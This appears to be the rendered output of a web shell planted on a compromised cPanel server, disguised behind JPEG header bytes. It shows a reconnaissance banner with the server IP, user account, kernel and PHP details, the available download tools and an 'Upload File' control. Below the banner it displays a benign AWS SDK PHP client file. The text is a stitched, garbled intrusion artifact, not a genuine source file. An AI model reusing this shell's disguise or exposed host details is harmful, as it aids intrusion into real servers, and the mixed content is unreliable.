����JFIF��x�x����'
Server IP : 78.140.185.180 / Your IP : 3.21.122.130 Web Server : LiteSpeed System : Linux cpanel13.v.fozzy.com 4.18.0-513.11.1.lve.el8.x86_64 #1 SMP Thu Jan 18 16:21:02 UTC 2024 x86_64 User : builderbox ( 1072) PHP Version : 7.3.33 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : OFF | Pkexec : OFF Directory : /home/builderbox/public_html/vendor/aws/aws-sdk-php/src/CustomerProfiles/ |
Upload File : |
<?php namespace Aws\CustomerProfiles; use Aws\AwsClient; /** * This client is used to interact with the **Amazon Connect Customer Profiles** service. * @method \Aws\Result addProfileKey(array $args = []) * @method \GuzzleHttp\Promise\Promise addProfileKeyAsync(array $args = []) * @method \Aws\Result createDomain(array $args = []) * @method \GuzzleHttp\Promise\Promise createDomainAsync(array $args = []) * @method \Aws\Result createProfile(array $args = []) * @method \GuzzleHttp\Promise\Promise createProfileAsync(array $args = []) * @method \Aws\Result deleteDomain(array $args = []) * @method \GuzzleHttp\Promise\Promise deleteDomainAsync(array $args = []) * @method \Aws\Result deleteIntegration(array $args = []) * @method \GuzzleHttp\Promise\Promise deleteIntegrationAsync(array $args = []) * @method \Aws\Result deleteProfile(array $args = []) * @method \GuzzleHttp\Promise\Promise deleteProfileAsync(array $args = []) * @method \Aws\Result deleteProfileKey(array $args = []) * @method \GuzzleHttp\Promise\Promise deleteProfileKeyAsync(array $args = []) * @method \Aws\Result deleteProfileObject(array $args = []) * @method \GuzzleHttp\Promise\Promise deleteProfileObjectAsync(array $args = []) * @method \Aws\Result deleteProfileObjectType(array $args = []) * @method \GuzzleHttp\Promise\Promise deleteProfileObjectTypeAsync(array $args = []) * @method \Aws\Result getDomain(array $args = []) * @method \GuzzleHttp\Promise\Promise getDomainAsync(array $args = []) * @method \Aws\Result getIntegration(array $args = []) * @method \GuzzleHttp\Promise\Promise getIntegrationAsync(array $args = []) * @method \Aws\Result getMatches(array $args = []) * @method \GuzzleHttp\Promise\Promise getMatchesAsync(array $args = []) * @method \Aws\Result getProfileObjectType(array $args = []) * @method \GuzzleHttp\Promise\Promise getProfileObjectTypeAsync(array $args = []) * @method \Aws\Result getProfileObjectTypeTemplate(array $args = []) * @method \GuzzleHttp\Promise\Promise getProfileObjectTypeTemplateAsync(array $args = []) * @method \Aws\Result listAccountIntegrations(array $args = []) * @method \GuzzleHttp\Promise\Promise listAccountIntegrationsAsync(array $args = []) * @method \Aws\Result listDomains(array $args = []) * @method \GuzzleHttp\Promise\Promise listDomainsAsync(array $args = []) * @method \Aws\Result listIntegrations(array $args = []) * @method \GuzzleHttp\Promise\Promise listIntegrationsAsync(array $args = []) * @method \Aws\Result listProfileObjectTypeTemplates(array $args = []) * @method \GuzzleHttp\Promise\Promise listProfileObjectTypeTemplatesAsync(array $args = []) * @method \Aws\Result listProfileObjectTypes(array $args = []) * @method \GuzzleHttp\Promise\Promise listProfileObjectTypesAsync(array $args = []) * @method \Aws\Result listProfileObjects(array $args = []) * @method \GuzzleHttp\Promise\Promise listProfileObjectsAsync(array $args = []) * @method \Aws\Result listTagsForResource(array $args = []) * @method \GuzzleHttp\Promise\Promise listTagsForResourceAsync(array $args = []) * @method \Aws\Result mergeProfiles(array $args = []) * @method \GuzzleHttp\Promise\Promise mergeProfilesAsync(array $args = []) * @method \Aws\Result putIntegration(array $args = []) * @method \GuzzleHttp\Promise\Promise putIntegrationAsync(array $args = []) * @method \Aws\Result putProfileObject(array $args = []) * @method \GuzzleHttp\Promise\Promise putProfileObjectAsync(array $args = []) * @method \Aws\Result putProfileObjectType(array $args = []) * @method \GuzzleHttp\Promise\Promise putProfileObjectTypeAsync(array $args = []) * @method \Aws\Result searchProfiles(array $args = []) * @method \GuzzleHttp\Promise\Promise searchProfilesAsync(array $args = []) * @method \Aws\Result tagResource(array $args = []) * @method \GuzzleHttp\Promise\Promise tagResourceAsync(array $args = []) * @method \Aws\Result untagResource(array $args = []) * @method \GuzzleHttp\Promise\Promise untagResourceAsync(array $args = []) * @method \Aws\Result updateDomain(array $args = []) * @method \GuzzleHttp\Promise\Promise updateDomainAsync(array $args = []) * @method \Aws\Result updateProfile(array $args = []) * @method \GuzzleHttp\Promise\Promise updateProfileAsync(array $args = []) */ class CustomerProfilesClient extends AwsClient {}